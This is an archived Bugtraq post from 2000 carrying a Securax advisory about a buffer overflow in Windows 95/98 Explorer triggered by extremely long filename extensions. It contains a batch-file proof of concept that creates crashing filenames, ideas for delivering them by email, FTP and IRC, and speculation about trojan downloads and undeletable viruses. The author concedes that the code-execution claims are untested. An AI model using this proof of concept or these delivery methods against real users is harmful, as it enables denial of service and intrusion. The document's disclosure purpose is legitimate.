[14618] in bugtraq
Securax Security Advisory: Windows98 contains a serious buffer
daemon@ATHENA.MIT.EDU (Zoa_Chien)
Sat Apr 22 02:54:15 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=====================_28161690==_"
Message-Id: <4.2.0.58.20000421191649.00a1a940@urc1.cc.kuleuven.ac.be>
Date: Fri, 21 Apr 2000 19:16:59 +0200
Reply-To: Zoa_Chien <zoa_chien@INAME.COM>
From: Zoa_Chien <zoa_chien@INAME.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
--=====================_28161690==_
Content-Type: text/plain; charset="us-ascii"; format=flowed
--=====================_28161690==_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="scx-sa-02.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Securax-SA-02 Security Advisory
belgian.networking.security Dutch
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Topic: Ms Windows '95?/'98/SE explorer.exe causes a buffer
overflow with long filename extensions.
Announced: 2000-04-21
Affects: Ms Windows'95?, Ms Windows '98, Ms Windows '98 SE,=20
windows millenium?.
None affected: Ms Windows NT Server/Workstation 4.0, Ms win2K
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR=20
RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS=20
100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
NOTICE.
PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING=20
THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ. =20
THANK YOU,
I. Background
I don't know what causes explorer to crash.
I suspect it be a buffer overflow in explorer.exe but in some cases=20
i noticed other programs (that do not use explorer.exe)to crash
too.=20
I don't have the time right now to start debugging, maybe i'll do so
next week. (if i find something usefull, i'll post an update)
II. Problem Description
When the Microsoft Windows explorer tries to access parsing a=20
filename that contains >129 chars in the extension, a buffer
will overflow
=20
And you will get this error:
EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=3D61616161 CS=3D0187 EIP=3D61616161 EFLGS=3D00010246
EBX=3D80070032 SS=3D018f ESP=3D01a1d8fc EBP=3D61616161
ECX=3Dc16b6f10 DS=3D018f ESI=3D01d0bd3c FS=3D5047
EDX=3D81724974 ES=3D018f EDI=3D7fcbd320 GS=3D0000
Bytes at CS:EIP:
Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161=20
61616161 61616161 61616161 61616161 61616161 61616161 61616161=20
61616161 61616161=20
As you can notice, the EIP was overwritten during this overflow,=20
this means we can execute code from in the filename.=20
We can use 247 + 129 + 118 bytes to store data for some shell
code.
=20
If you add some extra special characters to the file, you can cause
it to be recognized as write only in windows (and not found in dos)
That way, you will not be able to remove it unless you write=20
direct to the fat.
This would make viruses invincible for AV-tools.
=20
III. Reproduction of the problem
a) creating such a file:
place the following code in a .bat file:=20
---- cut here
=20
echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for=20
echo file management will cause a buffer overflow.
dir *.* > _=A0.=A0------Buffer=
overflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return adress with a false one.)
dir *.* >=
_=A0.=A0------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678=90AAAAAAAAAA
--- cut here
=20
now run the .bat file
b) using this bug on remote computers:
Tested on Eudora Pro:
You could attach the file to an e-mail and send this e-mail to
an unsuspected computer user. When he checks his e-mail an the=20
mail program attempts to save the attachement to disk, the=20
program will crash cause due to a buffer overflow.
=20
EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=3D007f0394 CS=3D0187 EIP=3D00428b05 EFLGS=3D00010206
EBX=3D00000000 SS=3D018f ESP=3D007eff88 EBP=3D007f0764
ECX=3D006a305c DS=3D018f ESI=3D007f07a8 FS=3D582f
EDX=3D007eff8c ES=3D018f EDI=3D8173b024 GS=3D0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00=20
Stack dump:
Funny note: every time you try to access the dir where the
attachement should have been saved, your program will crash,=20
even if this program is not using explorer for it's file=20
management. (In this case you don't even have to click on the
file or move over it and wait some time, it will crash=20
immediately, rendering the entire directory useless.
This is what i got in Windows Commander while trying to browse the
directory. Note: the file doesn't show up in a listing, neverthe
less, windows commander crashes with :
Application Error
Exception EAccessViolation in module WINCMD32.EXE at 7F8B0736
Access violation at address 7FCB1946. Read of address 00580939
Scanning this dir with scandisk does not report any problems.
c) uploading a file with this name to an FTP server, or place it
some HTTP server available for download.
d) DCC Sends on IRC.=20
=20
e) many more ?=20
III. Impact
This type of attack will allow any user local or remote with=20
file creation access to run hostile code on the computer.
(Since e-mail programs will attempt to write to disk, almost
any windows98 user with an e-mail adress is vulnerable.)
If someone writes some tiny code that will download and execute
a remote trojan, this could cause a huge problem!.
This could be used to gain root access to all windows computers=20
Just imagine what harm someone could cause if he sends out an=20
e-mail to 10.000 persons containing code to DDoS some server ?
=20
Writing such a code might be tricky, coz we are handling with a=20
filename, and not all hex codes are accepted as a legal filename.
(this could be partially circumvented by creating the filename=20
with a raw write to disk.)=20
=20
please note that due to my exams, i don't have the time to write
the shell code... everything stated about the executing of code=20
is purely hypothetical.
IV. Solution
=20
none yet.
just don't download extremely long filenames.
=20
V. Credits
Initial bug report : |ncubus -*- overflow detection + usage concepts
+ quickly written advisory by Zoa_Chien -*- Exploit shell-code : you?
-*- Thnx to Lamagra for testing this on NT. -*- bug by microsoft.
Final Notes: I discovered this while working on my soon to be released
tutorial: "Locally Hacking MS-Windows" if anyone has rare information
on this subject, feel free to mail me.
If any1 has a great job to offer, plies mail, i'm sick and tired of=20
studying stupid things.. mmm.. that reminds me, i'd better start=20
studing for my exam tomorrow morning=D3+W|~+=E6|=FE+=E9=83CARRIER LOST :-)=
=20
Yours,
Zoa_Chien, aka da G#df@rter. zoachien@securax.org
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
For more information advisory@securax.org
Website http://www.securax.org
Advisories/Text http://www.securax.org/pers
---------------------------------------------------------------------
--=====================_28161690==_--
